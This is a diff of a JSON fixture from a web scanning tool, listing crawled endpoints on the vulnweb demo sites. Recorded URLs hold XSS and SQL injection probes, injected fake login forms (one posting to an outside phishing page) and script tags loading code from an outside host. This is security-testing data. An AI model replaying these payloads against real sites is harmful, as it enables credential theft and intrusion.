"http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMertXSS", + "content_length": 3649, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:16.275Z", + "response_time": 0.34794860299999997, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 4, + "model": "startScan.endpoint", + "pk": 230, "fields": { - "name": "Ubuntu" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3Ftfsearch%3Da", + "content_length": 3637, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:16.413Z", + "response_time": 0.347631196, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 5, + "model": "startScan.endpoint", + "pk": 231, "fields": { - "name": "AngularJS" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch.asp%3F", + "content_length": 3613, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:16.533Z", + "response_time": 0.342509685, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 6, + "model": "startScan.endpoint", + "pk": 232, "fields": { - "name": "IIS:8.5" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml", + "content_length": 3673, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:16.651Z", + "response_time": 0.34625642599999995, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 7, + "model": "startScan.endpoint", + "pk": 233, "fields": { - "name": "Microsoft ASP.NET" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize.asp%3Fitem%3Dhtml%2Fabout.html", + "content_length": 3673, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:16.769Z", + "response_time": 0.356219873, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 8, + "model": "startScan.endpoint", + "pk": 234, "fields": { - "name": "Windows Server" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%26tfSearch%3Dalert%282%29%253C%2Fscript%253E", + "content_length": 3781, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:16.896Z", + "response_time": 0.355017995, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 9, + "model": "startScan.endpoint", + "pk": 235, "fields": { - "name": "Apache HTTP Server:2.4.25" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520var%2520x%3D%5B%27%27%26tfSearch%3D%27%27%5D%3B%253C%2Fscript%253E", + "content_length": 3839, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:17.027Z", + "response_time": 0.34938759599999997, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 10, + "model": "startScan.endpoint", + "pk": 236, "fields": { - "name": "Debian" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2Fsearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%281%29%3B%2520%2F%2F%26tfSearch%3D%253C%2Fscript%253E", + "content_length": 3785, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:17.165Z", + "response_time": 0.355915575, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 11, + "model": "startScan.endpoint", + "pk": 237, "fields": { - "name": "PHP:7.1.26" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0%2Band%2B1%3D1%2D%2D%255BTrue%255D", + "content_length": 3699, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:17.291Z", + "response_time": 0.346123222, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 12, + "model": "startScan.endpoint", + "pk": 238, "fields": { - "name": "Microsoft ASP.NET:2.0.50727" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0", + "content_length": 3631, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:17.423Z", + "response_time": 0.35269645000000005, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 13, + "model": "startScan.endpoint", + "pk": 239, "fields": { - "name": "Microsoft Visual Studio" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1", + "content_length": 3631, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:17.553Z", + "response_time": 0.34825364200000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 14, + "model": "startScan.endpoint", + "pk": 240, "fields": { - "name": "Bootstrap" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1%29%28%28%29%28%2E%2C%2C%27%22", + "content_length": 3691, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:17.685Z", + "response_time": 0.352645964, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 15, + "model": "startScan.endpoint", + "pk": 241, "fields": { - "name": "Basic" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2", + "content_length": 3631, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:17.817Z", + "response_time": 0.351088381, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.ipaddress", - "pk": 1, + "model": "startScan.endpoint", + "pk": 242, "fields": { - "address": "44.228.249.3", - "is_cdn": false, - "geo_iso": null, - "version": null, - "is_private": false, - "reverse_pointer": null, - "ports": [ - 2 + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum.asp%3Fid%3D0%2Band%2B1%3D1--%255BTrue%255D", + "content_length": 3699, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:24.553Z", + "response_time": 0.344934782, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 ], - "ip_subscan_ids": [] + "endpoint_subscan_ids": [] } }, { - "model": "startScan.ipaddress", - "pk": 2, + "model": "startScan.endpoint", + "pk": 243, "fields": { - "address": "44.238.29.244", - "is_cdn": false, - "geo_iso": null, - "version": null, - "is_private": false, - "reverse_pointer": null, - "ports": [ - 2 + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum.asp%3Fid%3D0", + "content_length": 3631, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:24.704Z", + "response_time": 0.357526716, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 ], - "ip_subscan_ids": [] + "endpoint_subscan_ids": [] } }, { - "model": "startScan.ipaddress", - "pk": 3, + "model": "startScan.endpoint", + "pk": 244, "fields": { - "address": "35.81.188.86", - "is_cdn": false, - "geo_iso": null, - "version": null, - "is_private": false, - "reverse_pointer": null, - "ports": [ - 1, - 2 + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum.asp%3Fid%3D2", + "content_length": 3631, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:24.839Z", + "response_time": 0.346497067, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 ], - "ip_subscan_ids": [] - } -}, -{ - "model": "startScan.port", - "pk": 1, - "fields": { - "number": 8080, - "service_name": "unknown", - "description": "", - "is_uncommon": true + "endpoint_subscan_ids": [] } }, { - "model": "startScan.port", - "pk": 2, + "model": "startScan.endpoint", + "pk": 309, "fields": { - "number": 80, - "service_name": "unknown", - "description": "", - "is_uncommon": false + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp", + "content_length": 2809, + "page_title": "acuforum search", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:46.097Z", + "response_time": 0.34940002600000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 1, + "model": "startScan.endpoint", + "pk": 310, "fields": { - "length": 28674, - "lines": 688, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=4290", + "content_length": 3585, + "page_title": "acuforum register", "http_status": 200, - "words": 5389, - "name": "ZG9jcy8=", - "url": "http://rest.vulnweb.com/docs/", - "content_type": "text/html; charset=UTF-8" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:46.216Z", + "response_time": 0.35666013900000004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 2, + "model": "startScan.endpoint", + "pk": 311, "fields": { - "length": 3555, - "lines": 138, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch", + "content_length": 2825, + "page_title": "acuforum search", "http_status": 200, - "words": 1397, - "name": "aW5kZXgucGhw", - "url": "http://rest.vulnweb.com/index.php", - "content_type": "text/html; charset=UTF-8" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:46.335Z", + "response_time": 0.349618676, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 3, + "model": "startScan.endpoint", + "pk": 312, "fields": { - "length": 3555, - "lines": 138, - "http_status": 200, - "words": 1397, - "name": "aW5kZXgucEhw", - "url": "http://rest.vulnweb.com/index.pHp", - "content_type": "text/html; charset=UTF-8" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%27INJECTED_PARAM", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:46.541Z", + "response_time": 0.354979114, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 4, + "model": "startScan.endpoint", + "pk": 313, "fields": { - "length": 926, - "lines": 16, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%253", + "content_length": 2966, + "page_title": "acuforum search", "http_status": 200, - "words": 29, - "name": "X3Z0aV9jbmYv", - "url": "http://testasp.vulnweb.com/_vti_cnf/", - "content_type": "text/html" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:46.646Z", + "response_time": 0.356571275, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 5, + "model": "startScan.endpoint", + "pk": 314, "fields": { - "length": 3194, - "lines": 55, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%25u003C%25s%25v%25g%25%20%25o%25n%25l%25o%25a%25d%25%25u003D%25a%25l%25e%25r%25t%25(%251%25)%25%3E", + "content_length": 4461, + "page_title": "acuforum search", "http_status": 200, - "words": 429, - "name": "bG9naW4uYXNw", - "url": "http://testasp.vulnweb.com/login.asp", - "content_type": "text/html" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:46.763Z", + "response_time": 0.357954559, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 6, + "model": "startScan.endpoint", + "pk": 315, "fields": { - "length": 13, - "lines": 1, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EBitte+loggen+Sie+sich+ein+bevor+Sie++fortfahren:+%3Cform+action+%3D%22destination.aps%22%3E%3Ctable%3E+%3Ctr%3E+%3Ctd%3ELogin:%3C/td%3E+%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3C/td%3E+%3C/tr%3E+%3Ctr%3E+%3Ctd%3EPasswort:%3C/td%3E+%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dpassword%3C/td%3E+%3C/tr%3E%3C/table%3E+%3Cinput+type%3Dsubmit+value%3Dlogin%3E%3C/form%3E", + "content_length": 4411, + "page_title": "acuforum search", "http_status": 200, - "words": 2, - "name": "cm9ib3RzLnR4dA==", - "url": "http://testasp.vulnweb.com/robots.txt", - "content_type": "text/plain" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:46.879Z", + "response_time": 0.355370976, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 7, + "model": "startScan.endpoint", + "pk": 316, "fields": { - "length": 894, - "lines": 4, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+logi", + "content_length": 3045, + "page_title": "acuforum search", "http_status": 200, - "words": 2, - "name": "ZmF2aWNvbi5pY28=", - "url": "http://testaspnet.vulnweb.com/favicon.ico", - "content_type": "image/x-icon" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:46.997Z", + "response_time": 0.356803198, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 8, + "model": "startScan.endpoint", + "pk": 317, "fields": { - "length": 13, - "lines": 1, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+", + "content_length": 3074, + "page_title": "acuforum search", "http_status": 200, - "words": 2, - "name": "cm9ib3RzLnR4dA==", - "url": "http://testaspnet.vulnweb.com/robots.txt", - "content_type": "text/plain" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:47.119Z", + "response_time": 0.356530453, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 9, + "model": "startScan.endpoint", + "pk": 318, "fields": { - "length": 3, - "lines": 1, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3C%20form+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+%20length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20+type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type%3Dsubmit+value%20%3DLOGIN%3E%3C%2Fform%3E", + "content_length": 4428, + "page_title": "acuforum search", "http_status": 200, - "words": 1, - "name": "dGVzdC50eHQ=", - "url": "http://testaspnet.vulnweb.com/test.txt", - "content_type": "text/plain" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:47.237Z", + "response_time": 0.356702043, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 10, + "model": "startScan.endpoint", + "pk": 319, "fields": { - "length": 4472, - "lines": 101, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp", + "content_length": 3295, + "page_title": "acuforum search", "http_status": 200, - "words": 899, - "name": "Y29tbWVudA==", - "url": "http://testhtml5.vulnweb.com/comment", - "content_type": "text/html; charset=utf-8" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:47.353Z", + "response_time": 0.3481126, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 11, + "model": "startScan.endpoint", + "pk": 320, "fields": { - "length": 493, - "lines": 15, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2F", + "content_length": 3458, + "page_title": "acuforum search", "http_status": 200, - "words": 87, - "name": "ZXhhbXBsZXM=", - "url": "http://testhtml5.vulnweb.com/examples", - "content_type": "text/html; charset=utf-8" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:47.470Z", + "response_time": 0.356131556, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 12, + "model": "startScan.endpoint", + "pk": 321, "fields": { - "length": 894, - "lines": 81, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%253", + "content_length": 3506, + "page_title": "acuforum search", "http_status": 200, - "words": 4, - "name": "ZmF2aWNvbi5pY28=", - "url": "http://testhtml5.vulnweb.com/favicon.ico", - "content_type": "image/x-icon" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:47.586Z", + "response_time": 0.360297743, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 13, + "model": "startScan.endpoint", + "pk": 322, "fields": { - "length": 4462, - "lines": 101, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C", + "content_length": 3719, + "page_title": "acuforum search", "http_status": 200, - "words": 898, - "name": "cmVwb3J0", - "url": "http://testhtml5.vulnweb.com/report", - "content_type": "text/html; charset=utf-8" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:47.701Z", + "response_time": 0.36063752899999996, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 14, + "model": "startScan.endpoint", + "pk": 323, "fields": { - "length": 386, - "lines": 14, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinp", + "content_length": 3925, + "page_title": "acuforum search", "http_status": 200, - "words": 54, - "name": "c2FtcGxlcy8=", - "url": "http://testhtml5.vulnweb.com/samples/", - "content_type": "text/html; charset=utf-8" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:47.819Z", + "response_time": 0.360611674, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 15, + "model": "startScan.endpoint", + "pk": 324, "fields": { - "length": 386, - "lines": 14, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/cfy.js%22%3E%3C%2Fscript%3E", + "content_length": 3185, + "page_title": "acuforum search", "http_status": 200, - "words": 54, - "name": "c2FtcGxlcw==", - "url": "http://testhtml5.vulnweb.com/samples", - "content_type": "text/html; charset=utf-8" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:47.948Z", + "response_time": 0.351855105, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 16, + "model": "startScan.endpoint", + "pk": 325, "fields": { - "length": 6, - "lines": 1, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+your+form+facebbok+below+before+proceeding:%3Cform+action%3D%22http://www.vineyarddowntown.org/pdf/phish.php%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin:%3C/td%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dpassword%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Cinput+type%3Dsubmit+value%3DLOGIN%3E%3C/form%3E", + "content_length": 4513, + "page_title": "acuforum search", "http_status": 200, - "words": 1, - "name": "LmlkZWEvLm5hbWU=", - "url": "http://testphp.vulnweb.com/.idea/.name", - "content_type": "application/octet-stream" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:48.083Z", + "response_time": 0.35719653599999995, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 17, + "model": "startScan.endpoint", + "pk": 326, "fields": { - "length": 951, - "lines": 14, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/nip.js%22%3E%3C%2Fscript%3E", + "content_length": 3185, + "page_title": "acuforum search", "http_status": 200, - "words": 427, - "name": "LmlkZWEv", - "url": "http://testphp.vulnweb.com/.idea/", - "content_type": "text/html" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:48.213Z", + "response_time": 0.351899102, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 18, + "model": "startScan.endpoint", + "pk": 327, "fields": { - "length": 171, - "lines": 6, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/sc.js%22%3E%3C%2Fscript%3E", + "content_length": 3182, + "page_title": "acuforum search", "http_status": 200, - "words": 10, - "name": "LmlkZWEvZW5jb2RpbmdzLnhtbA==", - "url": "http://testphp.vulnweb.com/.idea/encodings.xml", - "content_type": "text/xml" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:48.333Z", + "response_time": 0.357281375, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 19, + "model": "startScan.endpoint", + "pk": 328, "fields": { - "length": 275, - "lines": 10, - "http_status": 200, - "words": 26, - "name": "LmlkZWEvbW9kdWxlcy54bWw=", - "url": "http://testphp.vulnweb.com/.idea/modules.xml", - "content_type": "text/xml" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%3Ealert(%27xss%27)%3C%2Fscript%3E", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:48.453Z", + "response_time": 0.345318333, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 20, + "model": 